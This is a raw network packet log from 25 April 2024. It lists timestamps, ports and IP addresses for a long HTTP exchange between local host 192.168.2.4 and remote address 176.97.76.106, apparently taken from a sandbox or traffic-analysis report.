Apr 25, 2024 09:04:02.061342955 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.061342955 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.061393976 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.061399937 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.061451912 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.075320959 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.075390100 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.075395107 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.075472116 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.118074894 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.118144989 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.118151903 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.118218899 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.182939053 CEST	80	49734	185.172.128.76	192.168.2.4
Apr 25, 2024 09:04:02.258795023 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.258815050 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.258826971 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.258838892 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.258851051 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.258883953 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.258905888 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.258905888 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.258929968 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.258930922 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.258971930 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.258995056 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.259007931 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.259063005 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.259063959 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.259063959 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.259078979 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.259090900 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.259111881 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.259133101 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.259164095 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.259164095 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.259190083 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.259191990 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.259231091 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.259258986 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.259290934 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.259291887 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.259291887 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.259351969 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.259366035 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.259377956 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.259414911 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.259423971 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.259435892 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.259458065 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.259473085 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.259474993 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.259526014 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.259533882 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.259533882 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.259558916 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.259601116 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.259650946 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.259650946 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.259685993 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.259736061 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.259742975 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.259756088 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.259777069 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.259792089 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.259804010 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.259834051 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.259843111 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.259844065 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.259907961 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.259911060 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.259921074 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.259952068 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.259954929 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.259998083 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.260042906 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.260078907 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.260078907 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.260114908 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.260139942 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.260153055 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.260176897 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.260194063 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.260200024 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.260231018 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.260258913 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.260286093 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.260291100 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.260303974 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.260324001 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.260324955 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.260365963 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.260377884 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.260377884 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.260430098 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.260442019 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.260453939 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.260471106 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.260488987 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.260493040 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.260535955 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.260540962 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.260548115 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.260595083 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.260597944 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.260597944 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.260627031 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.260637999 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.260669947 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.260740042 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.260807991 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.260884047 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.260926962 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.260981083 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.260981083 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.260994911 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.261034012 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.261056900 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.261089087 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.261101007 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.261122942 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.261133909 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.261157990 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.261178970 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.261203051 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.261239052 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.261241913 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.261261940 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.261284113 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.261285067 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.261293888 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.261326075 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.261349916 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.261392117 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.261403084 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.261435986 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.261447906 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.261460066 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.261461973 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.261480093 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.261504889 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.261518955 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.261569023 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.261574984 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.261640072 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.261650085 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.261652946 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.261691093 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.261691093 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.261714935 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.261775017 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.261806011 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.261820078 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.261873960 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.261874914 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.261917114 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.261917114 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.261969090 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.261970043 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.262036085 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.262058973 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.262151957 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.262152910 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.262152910 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.262164116 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.262196064 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.262207985 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.262224913 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.262245893 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.262245893 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.262260914 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.262264967 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.262303114 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.262303114 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.262304068 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.262346029 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.262352943 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.262365103 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.262402058 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.262456894 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.262470007 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.262504101 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.262516022 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.262521982 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.262527943 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.262545109 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.262561083 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.262594938 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.262609005 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.262639046 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.262691021 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.262696981 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.262696981 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.262729883 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.262742996 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.262792110 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.262804031 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.262804985 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.262830973 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.262855053 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.262866020 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.262901068 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.262929916 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.262945890 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.262945890 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.262945890 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.262984037 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.262988091 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.262996912 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.263041973 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.263045073 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.263056993 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.263091087 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.263104916 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.263118029 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.263133049 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.263201952 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.263209105 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.263214111 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.263226032 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.263237953 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.263271093 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.263303041 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.263303041 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.263303041 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.263314962 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.263336897 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.263377905 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.263377905 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.263411999 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.263423920 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.263433933 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.263461113 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.263462067 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.263525009 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.263537884 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.263540030 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.263540030 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.263555050 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.263586998 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.263606071 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.263626099 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.263626099 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.263626099 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.263653040 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.263660908 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.263673067 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.263684034 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.263715029 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.263737917 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.263737917 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.263782024 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.263803959 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.263808012 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.263839960 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.263861895 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.263899088 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.263902903 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.263902903 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.263926983 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.263930082 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.263950109 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.263993025 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.263993025 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.263993025 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.264005899 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.264046907 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.264055014 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.264111996 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.264117956 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.264142990 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.264154911 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.264192104 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.264249086 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.264301062 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.264362097 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.264374018 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.264369965 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.264405966 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.264447927 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.264450073 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.264450073 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.264483929 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.264492989 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.264588118 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.264592886 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.264628887 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.264697075 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.264708996 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.264722109 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.264734030 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.264755964 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.264777899 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.264810085 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.264810085 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.264810085 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.264844894 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.264874935 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.264878988 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.264940977 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.264970064 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.264983892 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.264991999 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.265006065 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.265017986 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.265027046 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.265048981 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.265053988 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.265145063 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.265151024 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.265218019 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.265229940 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.265240908 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.265295982 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.265296936 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.265296936 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.265319109 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.265341043 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.265372992 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.265372992 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.265381098 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.265413046 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.265422106 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.265445948 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.265486002 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.265486002 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.265531063 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.265543938 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.265577078 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.265597105 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.265600920 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.265639067 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.265650988 CEST	80	49733	176.97.76.106	192.168.2.4
